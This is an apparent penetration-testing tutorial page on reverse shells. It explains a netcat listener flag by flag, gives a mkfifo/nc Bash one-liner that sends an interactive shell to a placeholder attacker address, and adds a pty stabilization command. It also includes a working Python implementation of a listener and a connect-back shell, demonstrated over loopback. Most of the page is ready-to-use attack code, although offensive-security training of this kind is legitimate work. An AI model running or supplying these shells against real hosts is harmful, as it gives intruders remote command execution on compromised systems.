# Reverse Shell

A `Reverse Shell` is the most common type of shell, as it is the quickest and easiest method to obtain control over a compromised host. Once we identify a vulnerability on the remote host that allows remote code execution, we start a `netcat` listener on our machine on a port of our choosing, say port `1234`. With this listener in place, we execute a `reverse shell command` on the remote host that connects its shell, i.e., `Bash` or `PowerShell`, back to our `netcat` listener. Because the connection is initiated by the remote system outbound to us, it typically gets through even when inbound connections to the target are filtered; the result is a reverse connection to the remote system's shell.

Reverse shell one-liners for most shells and languages are collected online, so it is unnecessary to list them all here.

## Resources:

- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
- https://highon.coffee/blog/reverse-shell-cheat-sheet/

## Listeners:

### Netcat Listener

The first step is to start a `netcat` listener on a port of our choosing:

```shell
nc -lvnp 9443
```

| Flag      | Description                                                                         |
| --------- | ----------------------------------------------------------------------------------- |
| `-l`      | Listen mode, to wait for a connection to connect to us.                             |
| `-v`      | Verbose mode, so that we know when we receive a connection.                         |
| `-n`      | Disable DNS resolution and only connect from/to IPs, to speed up the connection.    |
| `-p 9443` | Port number `netcat` is listening on, and the reverse connection should be sent to. |

Any port works as long as the target can reach it; the port in the reverse shell command must match the one given to `-p`. Now that we have a `netcat` listener waiting for a connection, we can execute the reverse shell command that connects to us.

## Shells:

### Bash

```shell
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ATTACKING IP> <LISTENING PORT> >/tmp/f
```

This one-liner needs `nc` on the target. It removes any stale `/tmp/f`, creates a named pipe there, and builds a loop: `nc` connects to our listener and writes whatever we type into the pipe, `cat` reads the pipe and feeds it to `/bin/sh -i`, and the shell's output (stderr merged into stdout by `2>&1`) goes back through `nc` to us. Replace `<ATTACKING IP>` and `<LISTENING PORT>` with the listener's address and port.

## Stabilize a shell:

A shell obtained this way has no pseudo-terminal, so interactive programs, tab completion and job control do not behave as in a normal terminal, and `Ctrl-C` kills the `nc` listener (and with it the shell) instead of the foreground command. Spawning the shell inside a pty fixes most of this:

### Python 3

```shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
```
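The exchange described above (a listener waiting for the callback, and the target's shell wired to the connection it opens), as an added example that is not part of the original page: a loopback model in Python in which one process plays both sides, so the round trip can be run offline without `nc`. The helper names `start_listener`, `reverse_shell` and `run_session` are this example's own, and the demo connects to `127.0.0.1` on an ephemeral port in place of the `<ATTACKING IP>` and `<LISTENING PORT>` placeholders.

```python
"""
Loopback model of a reverse shell: a netcat-style listener ("attacker")
and a connect-back shell ("victim") in one Python process.

Example code added to illustrate the page; the helper names below are
hypothetical and not from any tool the page references.
"""
import socket
import subprocess
import threading


def start_listener(host="127.0.0.1", port=0):
    """Bind and listen, the equivalent of `nc -lvnp <port>`.

    port=0 asks the kernel for a free ephemeral port so the demo never
    collides with something already listening; read it back with
    srv.getsockname()[1].
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(1)
    return srv


def reverse_shell(host, port, shell="/bin/sh"):
    """Victim side: connect back to the listener, then run a shell whose
    stdin, stdout and stderr are the socket itself. This is what the
    mkfifo/nc one-liner achieves with a named pipe when the shell has no
    socket redirection of its own.

    The page's one-liner uses `sh -i`; here the shell runs non-interactively
    so the bytes the listener receives are only command output, which keeps
    the demo deterministic. Returns the shell's exit status.
    """
    sock = socket.create_connection((host, port))
    fd = sock.fileno()
    # Popen dup2()s the socket fd onto 0, 1 and 2 in the child.
    proc = subprocess.Popen([shell], stdin=fd, stdout=fd, stderr=fd)
    status = proc.wait()
    sock.close()  # last reference to the connection: listener sees EOF
    return status


def run_session(commands, timeout=10):
    """Attacker side: accept the callback, send commands, collect output.

    Runs the victim in a thread so one process plays both roles. Returns
    the decoded text the listener received.
    """
    srv = start_listener()
    port = srv.getsockname()[1]
    victim = threading.Thread(
        target=reverse_shell, args=("127.0.0.1", port), daemon=True
    )
    victim.start()

    conn, _peer = srv.accept()  # blocks until the victim connects back
    conn.settimeout(timeout)
    # Commands go over the wire exactly as typed at the nc prompt; the
    # trailing `exit` ends the shell so the socket closes cleanly.
    conn.sendall(commands.encode() + b"\nexit\n")

    received = b""
    while True:
        try:
            chunk = conn.recv(4096)
        except socket.timeout:
            break
        if not chunk:  # EOF: shell exited and the victim closed the socket
            break
        received += chunk

    conn.close()
    srv.close()
    victim.join(timeout)
    return received.decode(errors="replace")


if __name__ == "__main__":
    # Constructed demo input: prove the commands ran on the "victim" side.
    print(run_session("echo REVERSE_SHELL_OK; id"))
```

Run it as `python3 reverse_shell_demo.py` on any Linux or macOS host. On a real engagement the `reverse_shell` half is the one-liner executed on the target and the `run_session` half is `nc -lvnp`; the only difference is that the listener's address and port are chosen so the target can reach them.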